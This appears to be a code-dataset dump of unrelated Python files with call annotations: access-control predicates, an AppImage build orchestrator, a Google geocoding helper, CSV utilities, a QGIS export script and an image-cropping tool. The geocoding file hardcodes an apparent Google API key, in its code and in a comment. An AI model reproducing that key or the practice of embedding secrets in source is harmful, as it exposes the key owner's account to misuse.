return val | [((4, 1, 4, 34), 'numba.jit', 'jit', (), '', False, 'from numba import jit\n'), ((31, 15, 31, 32), 'numpy.exp', 'np.exp', ({(31, 22, 31, 31): '(-exponent)'}, {}), '(-exponent)', True, 'import numpy as np\n')] |
Cloud11665/satori-git | satori.core/satori/core/export/pc.py | ea1855a920c98b480423bf247bce6e5626985c4a | # vim:ts=4:sts=4:sw=4:expandtab
from token import token_container
from satori.core.export.type_helpers import DefineException
AccessDenied = DefineException('AccessDenied', 'You don\'t have rights to call this procedure')
class PCDeny(object):
def __call__(__pc__self, **kwargs):
return False
def __str__(__pc__self):
return 'imposible'
class PCPermit(object):
def __call__(__pc__self, **kwargs):
return True
def __str__(__pc__self):
return 'none'
class PCArg(object):
def __init__(__pc__self, name, perm):
super(PCArg, __pc__self).__init__()
__pc__self.name = name
__pc__self.perm = perm
def __call__(__pc__self, **kwargs):
return Privilege.demand(kwargs[__pc__self.name], __pc__self.perm)
def __str__(__pc__self):
return '{0} on {1}'.format(__pc__self.perm, __pc__self.name)
class PCArgField(object):
def __init__(__pc__self, name, field_name, perm):
super(PCArgField, __pc__self).__init__()
__pc__self.name = name
__pc__self.field_name = field_name
__pc__self.perm = perm
def __call__(__pc__self, **kwargs):
field = getattr(kwargs[__pc__self.name], __pc__self.field_name, None)
if field is None:
return False
return Privilege.demand(field, __pc__self.perm)
def __str__(__pc__self):
return '{0} on {1}.{2}'.format(__pc__self.perm, __pc__self.name, __pc__self.field_name)
class PCGlobal(object):
def __init__(__pc__self, perm):
super(PCGlobal, __pc__self).__init__()
__pc__self.perm = perm
def __call__(__pc__self, **kwargs):
return Privilege.global_demand(__pc__self.perm)
def __str__(__pc__self):
return 'global {0}'.format(__pc__self.perm)
class PCAnd(object):
def __init__(__pc__self, *subs):
super(PCAnd, __pc__self).__init__()
__pc__self.subs = subs
def __call__(__pc__self, **kwargs):
return all(x(**kwargs) for x in __pc__self.subs)
def __str__(__pc__self):
return '(' + ') and ('.join(str(p) for p in __pc__self.subs) + ')'
class PCOr(object):
def __init__(__pc__self, *subs):
super(PCOr, __pc__self).__init__()
__pc__self.subs = subs
def __call__(__pc__self, **kwargs):
return any(x(**kwargs) for x in __pc__self.subs)
def __str__(__pc__self):
return '(' + ') or ('.join(str(p) for p in __pc__self.subs) + ')'
class PCEach(object):
def __init__(__pc__self, name, sub):
super(PCEach, __pc__self).__init__()
__pc__self.name = name
__pc__self.sub = sub
def __call__(__pc__self, **kwargs):
if kwargs[__pc__self.name] is None:
return True
return all(__pc__self.sub(item=x) for x in kwargs[__pc__self.name])
def __str__(__pc__self):
return 'for every item in {0}: {1}'.format(__pc__self.name, str(__pc__self.sub))
class PCEachKey(object):
def __init__(__pc__self, name, sub):
super(PCEachKey, __pc__self).__init__()
__pc__self.name = name
__pc__self.sub = sub
def __call__(__pc__self, **kwargs):
if kwargs[__pc__self.name] is None:
return True
return all(__pc__self.sub(item=x) for x in kwargs[__pc__self.name].keys())
def __str__(__pc__self):
return 'for every item in {0}.keys(): {1}'.format(__pc__self.name, str(__pc__self.sub))
class PCEachValue(object):
def __init__(__pc__self, name, sub):
super(PCEachValue, __pc__self).__init__()
__pc__self.name = name
__pc__self.sub = sub
def __call__(__pc__self, **kwargs):
if kwargs[__pc__self.name] is None:
return True
return all(__pc__self.sub(item=x) for x in kwargs[__pc__self.name].values())
def __str__(__pc__self):
return 'for every item in {0}.values(): {1}'.format(__pc__self.name, str(__pc__self.sub))
class PCTokenUser(object):
def __init__(__pc__self, name):
super(PCTokenUser, __pc__self).__init__()
__pc__self.name = name
def __call__(__pc__self, **kwargs):
return token_container.token.role and token_container.token.role.id == kwargs[__pc__self.name].id
def __str__(__pc__self):
return '{0} equals to calling user'.format(__pc__self.name)
class PCTokenIsUser(object):
def __init__(__pc__self):
super(PCTokenIsUser, __pc__self).__init__()
def __call__(__pc__self, **kwargs):
return token_container.token.user is not None
def __str__(__pc__self):
return 'calling role is user'
class PCTokenIsMachine(object):
def __init__(__pc__self):
super(PCTokenIsMachine, __pc__self).__init__()
def __call__(__pc__self, **kwargs):
return token_container.token.machine is not None
def __str__(__pc__self):
return 'calling role is machine'
class PCRawBlob(object):
def __init__(__pc__self, name):
super(PCRawBlob, __pc__self).__init__()
__pc__self.name = name
def __call__(__pc__self, **kwargs):
if kwargs[__pc__self.name].is_blob:
return Privilege.global_demand('RAW_BLOB')
else:
return True
def __str__(__pc__self):
return 'global RAW_BLOB if {0}.is_blob = True'.format(__pc__self.name)
def init():
global Privilege
from satori.core.models import Privilege
| [((5, 15, 5, 95), 'satori.core.export.type_helpers.DefineException', 'DefineException', ({(5, 31, 5, 45): '"""AccessDenied"""', (5, 47, 5, 94): '"""You don\'t have rights to call this procedure"""'}, {}), '(\'AccessDenied\', "You don\'t have rights to call this procedure")', False, 'from satori.core.export.type_helpers import DefineException\n'), ((31, 15, 31, 73), 'satori.core.models.Privilege.demand', 'Privilege.demand', ({(31, 32, 31, 55): 'kwargs[__pc__self.name]', (31, 57, 31, 72): '__pc__self.perm'}, {}), '(kwargs[__pc__self.name], __pc__self.perm)', False, 'from satori.core.models import Privilege\n'), ((47, 15, 47, 55), 'satori.core.models.Privilege.demand', 'Privilege.demand', ({(47, 32, 47, 37): 'field', (47, 39, 47, 54): '__pc__self.perm'}, {}), '(field, __pc__self.perm)', False, 'from satori.core.models import Privilege\n'), ((58, 15, 58, 55), 'satori.core.models.Privilege.global_demand', 'Privilege.global_demand', ({(58, 39, 58, 54): '__pc__self.perm'}, {}), '(__pc__self.perm)', False, 'from satori.core.models import Privilege\n'), ((170, 19, 170, 54), 'satori.core.models.Privilege.global_demand', 'Privilege.global_demand', ({(170, 43, 170, 53): '"""RAW_BLOB"""'}, {}), "('RAW_BLOB')", False, 'from satori.core.models import Privilege\n')] |
AppImageCrafters/AppImageBuilder | appimagebuilder/orchestrator.py | dd041050e65f8eff28f878a092fd07bcf3ec5a4d | # Copyright 2021 Alexis Lopez Zubieta
#
# Permission is hereby granted, free of charge, to any person obtaining a
# copy of this software and associated documentation files (the "Software"),
# to deal in the Software without restriction, including without limitation the
# rights to use, copy, modify, merge, publish, distribute, sublicense, and/or
# sell copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in
# all copies or substantial portions of the Software.
import os
import pathlib
from appimagebuilder.utils.finder import Finder
from appimagebuilder.context import AppInfo, Context, BundleInfo
from appimagebuilder.commands.apt_deploy import AptDeployCommand
from appimagebuilder.commands.create_appimage import CreateAppImageCommand
from appimagebuilder.commands.file_deploy import FileDeployCommand
from appimagebuilder.commands.pacman_deploy import PacmanDeployCommand
from appimagebuilder.commands.run_script import RunScriptCommand
from appimagebuilder.commands.run_test import RunTestCommand
from appimagebuilder.commands.setup_app_info import SetupAppInfoCommand
from appimagebuilder.commands.setup_runtime import SetupRuntimeCommand
from appimagebuilder.commands.setup_symlinks import SetupSymlinksCommand
from appimagebuilder.commands.deploy_record import (
WriteDeployRecordCommand,
)
from appimagebuilder.recipe.roamer import Roamer
class Orchestrator:
"""Transforms a recipe into a command list"""
def process(self, recipe: Roamer, args):
if recipe.version() == 1:
return self._prepare_commands_for_recipe_v1(args, recipe)
raise RuntimeError("Unknown recipe version: %s" % recipe.version())
def _prepare_commands_for_recipe_v1(self, args, recipe):
context = self._extract_v1_recipe_context(args, recipe)
commands = []
if not args.skip_script:
command = RunScriptCommand(context, recipe.script, "main script")
commands.append(command)
if not args.skip_build:
commands.extend(self._create_app_dir_commands(context, recipe))
if not args.skip_tests and recipe.AppDir.test:
command = RunTestCommand(context, recipe.AppDir.test)
commands.append(command)
if not args.skip_appimage:
command = CreateAppImageCommand(context, recipe)
commands.append(command)
return commands
def _create_app_dir_commands(self, context, recipe):
commands = []
commands.extend(self._create_deploy_commands(context, recipe))
commands.extend(self._create_setup_commands(context, recipe))
commands.append(WriteDeployRecordCommand(context))
return commands
def _create_deploy_commands(self, context, recipe):
commands = []
if recipe.AppDir.before_bundle:
command = RunScriptCommand(
context, recipe.AppDir.before_bundle, "before bundle script"
)
commands.append(command)
apt_section = recipe.AppDir.apt
if apt_section:
command = self._generate_apt_deploy_command(context, apt_section)
commands.append(command)
pacman_section = recipe.AppDir.pacman
if pacman_section:
command = self._generate_pacman_deploy_command(context, pacman_section)
commands.append(command)
files_section = recipe.AppDir.files
if files_section:
command = FileDeployCommand(
context,
files_section.include() or [],
files_section.exclude() or [],
)
commands.append(command)
if recipe.AppDir.after_bundle:
command = RunScriptCommand(
context, recipe.AppDir.after_bundle, "after bundle script"
)
commands.append(command)
return commands
def _create_setup_commands(self, context, recipe):
commands = []
if recipe.AppDir.before_runtime:
command = RunScriptCommand(
context, recipe.AppDir.before_runtime, "before runtime script"
)
commands.append(command)
finder = Finder(context.app_dir)
commands.append(SetupSymlinksCommand(context, recipe, finder))
commands.append(SetupRuntimeCommand(context, recipe, finder))
commands.append(SetupAppInfoCommand(context))
if recipe.AppDir.after_runtime:
command = RunScriptCommand(
context, recipe.AppDir.after_runtime, "after runtime script"
)
commands.append(command)
return commands
def _generate_apt_deploy_command(self, context, apt_section):
apt_archs = apt_section.arch()
if isinstance(apt_archs, str):
apt_archs = [apt_archs]
sources = []
keys = []
for item in apt_section.sources():
if "sourceline" in item:
sources.append(item["sourceline"])
if "key_url" in item:
keys.append(item["key_url"])
return AptDeployCommand(
context,
apt_section.include(),
apt_section.exclude() or [],
apt_archs,
sources,
keys,
apt_section.allow_unauthenticated() or False,
)
def _generate_pacman_deploy_command(self, context, pacman_section):
return PacmanDeployCommand(
context,
pacman_section.include(),
pacman_section.exclude(),
pacman_section["Architecture"](),
pacman_section.repositories(),
pacman_section.options(),
)
def _extract_v1_recipe_context(self, args, recipe):
app_dir_path = pathlib.Path(args.appdir).absolute()
build_dir_path = pathlib.Path(args.build_dir).absolute()
app_info_section = recipe.AppDir.app_info
app_info = AppInfo(
app_info_section.id(),
app_info_section.name() or app_info_section.id(),
app_info_section.icon() or "application-vnd.appimage",
app_info_section.version(),
app_info_section.exec(),
app_info_section.exec_args(),
)
bundle_info = BundleInfo(
app_dir=app_dir_path,
app_info=app_info,
update_string=recipe.AppImage["update-information"]() or "guess",
runtime_arch=recipe.AppImage.arch(),
sign_key=recipe.AppImage["sign-key"]() or None,
file_name=recipe.AppImage["file_name"] or None,
)
return Context(
recipe=recipe,
recipe_path=pathlib.Path(args.recipe),
app_info=app_info,
bundle_info=bundle_info,
app_dir=app_dir_path,
build_dir=build_dir_path,
)
| [((111, 17, 111, 40), 'appimagebuilder.utils.finder.Finder', 'Finder', ({(111, 24, 111, 39): 'context.app_dir'}, {}), '(context.app_dir)', False, 'from appimagebuilder.utils.finder import Finder\n'), ((45, 22, 45, 77), 'appimagebuilder.commands.run_script.RunScriptCommand', 'RunScriptCommand', ({(45, 39, 45, 46): 'context', (45, 48, 45, 61): 'recipe.script', (45, 63, 45, 76): '"""main script"""'}, {}), "(context, recipe.script, 'main script')", False, 'from appimagebuilder.commands.run_script import RunScriptCommand\n'), ((52, 22, 52, 65), 'appimagebuilder.commands.run_test.RunTestCommand', 'RunTestCommand', ({(52, 37, 52, 44): 'context', (52, 46, 52, 64): 'recipe.AppDir.test'}, {}), '(context, recipe.AppDir.test)', False, 'from appimagebuilder.commands.run_test import RunTestCommand\n'), ((56, 22, 56, 60), 'appimagebuilder.commands.create_appimage.CreateAppImageCommand', 'CreateAppImageCommand', ({(56, 44, 56, 51): 'context', (56, 53, 56, 59): 'recipe'}, {}), '(context, recipe)', False, 'from appimagebuilder.commands.create_appimage import CreateAppImageCommand\n'), ((68, 24, 68, 57), 'appimagebuilder.commands.deploy_record.WriteDeployRecordCommand', 'WriteDeployRecordCommand', ({(68, 49, 68, 56): 'context'}, {}), '(context)', False, 'from appimagebuilder.commands.deploy_record import WriteDeployRecordCommand\n'), ((75, 22, 77, 13), 'appimagebuilder.commands.run_script.RunScriptCommand', 'RunScriptCommand', ({(76, 16, 76, 23): 'context', (76, 25, 76, 52): 'recipe.AppDir.before_bundle', (76, 54, 76, 76): '"""before bundle script"""'}, {}), "(context, recipe.AppDir.before_bundle, 'before bundle script')", False, 'from appimagebuilder.commands.run_script import RunScriptCommand\n'), ((96, 22, 98, 13), 'appimagebuilder.commands.run_script.RunScriptCommand', 'RunScriptCommand', ({(97, 16, 97, 23): 'context', (97, 25, 97, 51): 'recipe.AppDir.after_bundle', (97, 53, 97, 74): '"""after bundle script"""'}, {}), "(context, recipe.AppDir.after_bundle, 'after bundle script')", False, 'from appimagebuilder.commands.run_script import RunScriptCommand\n'), ((106, 22, 108, 13), 'appimagebuilder.commands.run_script.RunScriptCommand', 'RunScriptCommand', ({(107, 16, 107, 23): 'context', (107, 25, 107, 53): 'recipe.AppDir.before_runtime', (107, 55, 107, 78): '"""before runtime script"""'}, {}), "(context, recipe.AppDir.before_runtime, 'before runtime script'\n )", False, 'from appimagebuilder.commands.run_script import RunScriptCommand\n'), ((112, 24, 112, 69), 'appimagebuilder.commands.setup_symlinks.SetupSymlinksCommand', 'SetupSymlinksCommand', ({(112, 45, 112, 52): 'context', (112, 54, 112, 60): 'recipe', (112, 62, 112, 68): 'finder'}, {}), '(context, recipe, finder)', False, 'from appimagebuilder.commands.setup_symlinks import SetupSymlinksCommand\n'), ((114, 24, 114, 68), 'appimagebuilder.commands.setup_runtime.SetupRuntimeCommand', 'SetupRuntimeCommand', ({(114, 44, 114, 51): 'context', (114, 53, 114, 59): 'recipe', (114, 61, 114, 67): 'finder'}, {}), '(context, recipe, finder)', False, 'from appimagebuilder.commands.setup_runtime import SetupRuntimeCommand\n'), ((116, 24, 116, 52), 'appimagebuilder.commands.setup_app_info.SetupAppInfoCommand', 'SetupAppInfoCommand', ({(116, 44, 116, 51): 'context'}, {}), '(context)', False, 'from appimagebuilder.commands.setup_app_info import SetupAppInfoCommand\n'), ((119, 22, 121, 13), 'appimagebuilder.commands.run_script.RunScriptCommand', 'RunScriptCommand', ({(120, 16, 120, 23): 'context', (120, 25, 120, 52): 'recipe.AppDir.after_runtime', (120, 54, 120, 76): '"""after runtime script"""'}, {}), "(context, recipe.AppDir.after_runtime, 'after runtime script')", False, 'from appimagebuilder.commands.run_script import RunScriptCommand\n'), ((160, 23, 160, 48), 'pathlib.Path', 'pathlib.Path', ({(160, 36, 160, 47): 'args.appdir'}, {}), '(args.appdir)', False, 'import pathlib\n'), ((161, 25, 161, 53), 'pathlib.Path', 'pathlib.Path', ({(161, 38, 161, 52): 'args.build_dir'}, {}), '(args.build_dir)', False, 'import pathlib\n'), ((182, 24, 182, 49), 'pathlib.Path', 'pathlib.Path', ({(182, 37, 182, 48): 'args.recipe'}, {}), '(args.recipe)', False, 'import pathlib\n')] |
Musketeer-Liu/Auto_Coding_Tools_Box | API_Collections/googlemap_geocode.py | 96ffe3f194eb3571d290086400ef518cef4e0774 | # python3 --> Enter Python Shell
# from geocode import getGeocodeLocation
# getGeocodeLocation("Place you wanto to query")
import httplib2
import json
def getGeocodeLocation(inputString):
google_api_key = "AIzaSyDZHGnbFkjZcOEgYPpDqlO2YhBHKsNxhnE"
locatationString = inputString.replace(" ", "+")
url = ('https://maps.googleapis.com/maps/api/geocode/json?address=%s&key=%s'%(locatationString, google_api_key))
h = httplib2.Http()
response, content = h.request(url, 'GET')
result = json.loads(content)
latitude = result['results'][0]['geometry']['location']['lat']
longitude = result['results'][0]['geometry']['location']['lng']
# print(latitude, longitude)
return (latitude, longitude)
# print("response header: %s \n \n" % response)
# return result
# san_francisco = getGeocodeLocation("San Francisco, CA")
# response header: {'content-type': 'application/json; charset=UTF-8', 'date': 'Sat, 27 Jan 2018 06:25:35 GMT', 'expires': 'Sun, 28 Jan 2018 06:25:35 GMT', 'cache-control': 'public, max-age=86400', 'vary': 'Accept-Language', 'access-control-allow-origin': '*', 'server': 'mafe', 'content-length': '1749', 'x-xss-protection': '1; mode=block', 'x-frame-options': 'SAMEORIGIN', 'alt-svc': 'hq=":443"; ma=2592000; quic=51303431; quic=51303339; quic=51303338; quic=51303337; quic=51303335,quic=":443"; ma=2592000; v="41,39,38,37,35"', 'status': '200', '-content-encoding': 'gzip', 'content-location': 'https://maps.googleapis.com/maps/api/geocode/json?address=San+Francisco,+CA&key=AIzaSyDZHGnbFkjZcOEgYPpDqlO2YhBHKsNxhnE'}
# san_francisco
# {'results': [{'address_components': [{'long_name': 'San Francisco', 'short_name': 'SF', 'types': ['locality', 'political']}, {'long_name': 'San Francisco County', 'short_name': 'San Francisco County', 'types': ['administrative_area_level_2', 'political']}, {'long_name': 'California', 'short_name': 'CA', 'types': ['administrative_area_level_1', 'political']}, {'long_name': 'United States', 'short_name': 'US', 'types': ['country', 'political']}], 'formatted_address': 'San Francisco, CA, USA', 'geometry': {'bounds': {'northeast': {'lat': 37.9298239, 'lng': -122.28178}, 'southwest': {'lat': 37.6398299, 'lng': -123.173825}}, 'location': {'lat': 37.7749295, 'lng': -122.4194155}, 'location_type': 'APPROXIMATE', 'viewport': {'northeast': {'lat': 37.812,'lng': -122.3482}, 'southwest': {'lat': 37.70339999999999, 'lng': -122.527}}}, 'place_id': 'ChIJIQBpAG2ahYAR_6128GcTUEo', 'types': ['locality', 'political']}], 'status': 'OK'}
# san_francisco.keys()
# dict_keys(['results', 'status'])
# san_francisco['results'][0]['geometry']['location']['lat']
# 37.7749295
# san_francisco['results'][0]['geometry']['location']['lng']
# -122.4194155
| [((15, 8, 15, 23), 'httplib2.Http', 'httplib2.Http', ({}, {}), '()', False, 'import httplib2\n'), ((17, 13, 17, 32), 'json.loads', 'json.loads', ({(17, 24, 17, 31): 'content'}, {}), '(content)', False, 'import json\n')] |
makakken/roseguarden | backend/core/actions/actionGenerator.py | 9a867f3d5e979b990bf474dcba81e5e9d0814c6a | """
The roseguarden project
Copyright (C) 2018-2020 Marcus Drobisch,
This program is free software: you can redistribute it and/or modify it under
the terms of the GNU General Public License as published by the Free Software
Foundation, either version 3 of the License, or (at your option) any later
version.
This program is distributed in the hope that it will be useful, but WITHOUT
ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS
FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details.
You should have received a copy of the GNU General Public License along with
this program. If not, see <http://www.gnu.org/licenses/>.
"""
__authors__ = ["Marcus Drobisch"]
__contact__ = "[email protected]"
__credits__ = []
__license__ = "GPLv3"
class BaseAction(object):
action = 'undefined'
target = 'undefined'
source = 'server'
version = '1.0.0'
def __init__(self, ):
print("Instance of BaseAction created")
def execute(self, ):
print("Execute not defined")
@classmethod
def generate(cls, delay=0.0):
action = {}
action['action'] = cls.action
action['target'] = cls.target
action['version'] = cls.version
action['source'] = cls.source
action['delay'] = delay
return action
class BaseNodeAction(object):
action = 'undefined'
version = '1.0.0'
def __init__(self, ):
print("Instance of BaseAction created")
def execute(self, ):
print("Execute not defined")
@classmethod
def generate(cls):
action = {}
action['action'] = cls.action
action['version'] = cls.version
return action
| [] |
arnscott/gcounter | lib/csv/csv.py | ffb6628f1b1f0e6c70168ff738fd51fa08e0df18 | """
MIT License
Copyright (c) 2018 Aaron Michael Scott
Permission is hereby granted, free of charge, to any person obtaining a copy
of this software and associated documentation files (the "Software"), to deal
in the Software without restriction, including without limitation the rights
to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
copies of the Software, and to permit persons to whom the Software is
furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in all
copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
SOFTWARE.
"""
import datetime
import csv
import os
class CSVReader(object):
"""Wrapper for reading csv files.
Takes just the filepath as an argument.
Use the iterrecords() generator method for large data sets for increased performance.
"""
def __init__(self, file_path, delimiter=','):
self.file_path = file_path
self.delimiter = delimiter
def read_to_list(self):
"""Returns the records in the csv as a list[]
Each record is a dictionary
"""
records = []
with open(self.file_path) as source:
reader = csv.DictReader(source,
delimiter=self.delimiter)
for row in reader:
records.append(row)
return records
def read_to_dict(self, key_field):
"""Returns the records in the csv as a dictionary.
The key value is specified by the key_field argument for each record
"""
records = {}
with open(self.file_path) as source:
reader = csv.DictReader(source,
delimiter=self.delimiter)
self.headers = reader.fieldnames
if key_field in self.headers:
for row in reader:
if not row[key_field] in records:
records[row[key_field]] = row
else:
raise Exception('The key provided does not have unique values.')
else:
raise KeyError('The key provided does not exist')
return records
def iterrecords(self):
"""Generator method that provides a more efficient way to iterate records.
for record in instance.iterrecords():
print(record)
"""
records = []
with open(self.file_path) as source:
reader = csv.DictReader(source,
delimiter=self.delimiter)
for row in reader:
yield row
class CSVWriter(object):
"""Wrapper for writing csv files.
takes the file path and a list of headers as arguments
"""
def __init__(self, file_path, headers):
self.headers = headers
self.file_path = file_path
def write_from_list(self, records=[]):
"""Writes the csv to the indicated file_path
taking a list[] of records as the argument
where each record is a dictionary.
Only the fields in self.headers will be written to the csv.
But extra fields can be passed, they will just be skipped over.
"""
if isinstance(records, list):
with open(self.file_path, 'w') as csvfile:
writer = csv.DictWriter(csvfile,
fieldnames=self.headers)
writer.writeheader()
for record in records:
if isinstance(record, dict):
row = {field: record[field] for field in self.headers}
writer.writerow(row)
else:
raise Exception('Items in list must be of type dict')
else:
raise Exception('Must pass a list object as the records list')
return self.file_path
def write_from_dict(self, records={}):
"""Writes the csv to the indicated file_path
taking a dict{} of records as the argument
where each item in the dict{} is also a dict{}
"""
with open(self.file_path, 'w') as csvfile:
writer = csv.DictWriter(csvfile,
fieldnames=self.headers)
writer.writeheader()
for key, record in records.items():
row = {field: record[field] for field in self.headers}
writer.writerow(row)
return self.file_path
def reader(file_path='', delimiter=','):
"""Returns a CSVReader object
"""
if os.path.isfile(file_path):
if os.access(file_path, os.R_OK):
return CSVReader(file_path, delimiter=delimiter)
else:
raise Exception('{fname} exists but is not readable.'.format(fname=file_path))
else:
raise Exception('{fname} does not exist'.format(fname=file_path))
def writer(file_path='', headers=[]):
"""Returns a CSVWriter object
"""
if not os.path.isfile(file_path):
if isinstance(headers, list):
return CSVWriter(file_path=file_path, headers=headers)
else:
raise Exception('Headers need to be in a list object.')
else:
raise Exception('{fname} is already a file. Please write to a new location.'.format(fname=file_path))
def the_date():
return datetime.date.today().strftime('%m_%d_%Y')
| [((138, 7, 138, 32), 'os.path.isfile', 'os.path.isfile', ({(138, 22, 138, 31): 'file_path'}, {}), '(file_path)', False, 'import os\n'), ((139, 11, 139, 40), 'os.access', 'os.access', ({(139, 21, 139, 30): 'file_path', (139, 32, 139, 39): 'os.R_OK'}, {}), '(file_path, os.R_OK)', False, 'import os\n'), ((149, 11, 149, 36), 'os.path.isfile', 'os.path.isfile', ({(149, 26, 149, 35): 'file_path'}, {}), '(file_path)', False, 'import os\n'), ((49, 21, 50, 61), 'csv.DictReader', 'csv.DictReader', (), '', False, 'import csv\n'), ((61, 21, 62, 61), 'csv.DictReader', 'csv.DictReader', (), '', False, 'import csv\n'), ((82, 21, 83, 61), 'csv.DictReader', 'csv.DictReader', (), '', False, 'import csv\n'), ((126, 21, 127, 60), 'csv.DictWriter', 'csv.DictWriter', (), '', False, 'import csv\n'), ((161, 11, 161, 32), 'datetime.date.today', 'datetime.date.today', ({}, {}), '()', False, 'import datetime\n'), ((107, 25, 108, 64), 'csv.DictWriter', 'csv.DictWriter', (), '', False, 'import csv\n')] |
karant17/Test | Module01/LearningQGIS_ThirdEdition_Code/Chapter6_code/export_map.py | e44bf79f597d53de2b891372ffccf7f13c74ede3 | from PyQt4.QtGui import QImage, QPainter
from PyQt4.QtCore import QSize
# configure the output image
width = 800
height = 600
dpi = 92
img = QImage(QSize(width, height), QImage.Format_RGB32)
img.setDotsPerMeterX(dpi / 25.4 * 1000)
img.setDotsPerMeterY(dpi / 25.4 * 1000)
# get the map layers and extent
layers = [ layer.id() for layer in iface.legendInterface().layers() ]
extent = iface.mapCanvas().extent()
# configure map settings for export
mapSettings = QgsMapSettings()
mapSettings.setMapUnits(0)
mapSettings.setExtent(extent)
mapSettings.setOutputDpi(dpi)
mapSettings.setOutputSize(QSize(width, height))
mapSettings.setLayers(layers)
mapSettings.setFlags(QgsMapSettings.Antialiasing | QgsMapSettings.UseAdvancedEffects | QgsMapSettings.ForceVectorOutput | QgsMapSettings.DrawLabeling)
# configure and run painter
p = QPainter()
p.begin(img)
mapRenderer = QgsMapRendererCustomPainterJob(mapSettings, p)
mapRenderer.start()
mapRenderer.waitForFinished()
p.end()
# save the result
img.save("C:/temp/custom_export.png","png") | [((22, 4, 22, 14), 'PyQt4.QtGui.QPainter', 'QPainter', ({}, {}), '()', False, 'from PyQt4.QtGui import QImage, QPainter\n'), ((7, 13, 7, 33), 'PyQt4.QtCore.QSize', 'QSize', ({(7, 19, 7, 24): 'width', (7, 26, 7, 32): 'height'}, {}), '(width, height)', False, 'from PyQt4.QtCore import QSize\n'), ((18, 26, 18, 46), 'PyQt4.QtCore.QSize', 'QSize', ({(18, 32, 18, 37): 'width', (18, 39, 18, 45): 'height'}, {}), '(width, height)', False, 'from PyQt4.QtCore import QSize\n')] |
DIVA-DIA/DIVA-DAF | tools/generate_cropped_dataset.py | 0ae3b873d04f1852d9053cb4cb2fbc7bda73471c | """
Load a dataset of historic documents by specifying the folder where its located.
"""
import argparse
# Utils
import itertools
import logging
import math
from datetime import datetime
from pathlib import Path
from torchvision.datasets.folder import has_file_allowed_extension, pil_loader
from torchvision.transforms import functional as F
from tqdm import tqdm
IMG_EXTENSIONS = ('.jpg', '.jpeg', '.png', '.ppm', '.bmp', '.pgm', '.gif')
JPG_EXTENSIONS = ('.jpg', '.jpeg')
def get_img_paths_uncropped(directory):
"""
Parameters
----------
directory: string
parent directory with images inside
Returns
-------
paths: list of paths
"""
paths = []
directory = Path(directory).expanduser()
if not directory.is_dir():
logging.error(f'Directory not found ({directory})')
for subdir in sorted(directory.iterdir()):
if not subdir.is_dir():
continue
for img_name in sorted(subdir.iterdir()):
if has_file_allowed_extension(str(img_name), IMG_EXTENSIONS):
paths.append((subdir / img_name, str(subdir.stem)))
return paths
class ImageCrop(object):
"""
Crop the data and ground truth image at the specified coordinates to the specified size and convert
them to a tensor.
"""
def __init__(self, crop_size):
self.crop_size = crop_size
def __call__(self, img, coordinates):
"""
Args:
img (PIL Image): Data image to be cropped and converted to tensor.
gt (PIL Image): Ground truth image to be cropped and converted to tensor.
Returns:
Data tensor, gt tensor (tuple of tensors): cropped and converted images
"""
x_position = coordinates[0]
y_position = coordinates[1]
img_crop = F.to_tensor(
F.crop(img=img, left=x_position, top=y_position, width=self.crop_size, height=self.crop_size))
return img_crop
class CroppedDatasetGenerator:
def __init__(self, input_path: Path, output_path, crop_size_train, crop_size_val, crop_size_test, overlap=0.5,
leading_zeros_length=4, override_existing=False):
# Init list
self.input_path = input_path
self.output_path = output_path
self.crop_size_train = crop_size_train
self.crop_size_val = crop_size_val
self.crop_size_test = crop_size_test
self.overlap = overlap
self.leading_zeros_length = leading_zeros_length
self.override_existing = override_existing
self.generator_train = CropGenerator(input_path=input_path / 'train',
output_path=output_path / 'train',
crop_size=crop_size_train,
overlap=overlap,
leading_zeros_length=leading_zeros_length,
override_existing=override_existing,
progress_title='Cropping "train"')
self.generator_val = CropGenerator(input_path=input_path / 'val',
output_path=output_path / 'val',
crop_size=crop_size_val,
overlap=overlap,
leading_zeros_length=leading_zeros_length,
override_existing=override_existing,
progress_title='Cropping "val"')
self.generator_test = CropGenerator(input_path=input_path / 'test',
output_path=output_path / 'test',
crop_size=crop_size_test,
overlap=overlap,
leading_zeros_length=leading_zeros_length,
override_existing=override_existing,
progress_title='Cropping "test"')
def write_crops(self):
info_list = ['Running CroppedDatasetGenerator.write_crops():',
f'- full_command:',
f'python tools/generate_cropped_dataset.py -i {self.input_path} -o {self.output_path} '
f'-tr {self.crop_size_train} -v {self.crop_size_val} -te {self.crop_size_test} -ov {self.overlap} '
f'-l {self.leading_zeros_length}',
f'',
f'- start_time: \t{datetime.now():%Y-%m-%d_%H-%M-%S}',
f'- input_path: \t{self.input_path}',
f'- output_path: \t{self.output_path}',
f'- crop_size_train: \t{self.crop_size_train}',
f'- crop_size_val: \t{self.crop_size_val}',
f'- crop_size_test: \t{self.crop_size_test}',
f'- overlap: \t{self.overlap}',
f'- leading_zeros_len:\t{self.leading_zeros_length}',
f'- override_existing:\t{self.override_existing}',
''] # empty string to get linebreak at the end when using join
info_str = '\n'.join(info_list)
print(info_str)
# Write info_cropped_dataset.txt
self.output_path.mkdir(parents=True, exist_ok=True)
info_file = self.output_path / 'info_cropped_dataset.txt'
with info_file.open('a') as f:
f.write(info_str)
print(f'Start cropping:')
self.generator_train.write_crops()
self.generator_val.write_crops()
self.generator_test.write_crops()
with info_file.open('a') as f:
f.write(f'- end_time: \t{datetime.now():%Y-%m-%d_%H-%M-%S}\n\n')
class CropGenerator:
def __init__(self, input_path, output_path, crop_size, overlap=0.5, leading_zeros_length=4,
override_existing=False, progress_title=''):
# Init list
self.input_path = input_path
self.output_path = output_path
self.crop_size = crop_size
self.overlap = overlap
self.leading_zeros_length = leading_zeros_length
self.override_existing = override_existing
self.progress_title = progress_title
self.step_size = int(self.crop_size * (1 - self.overlap))
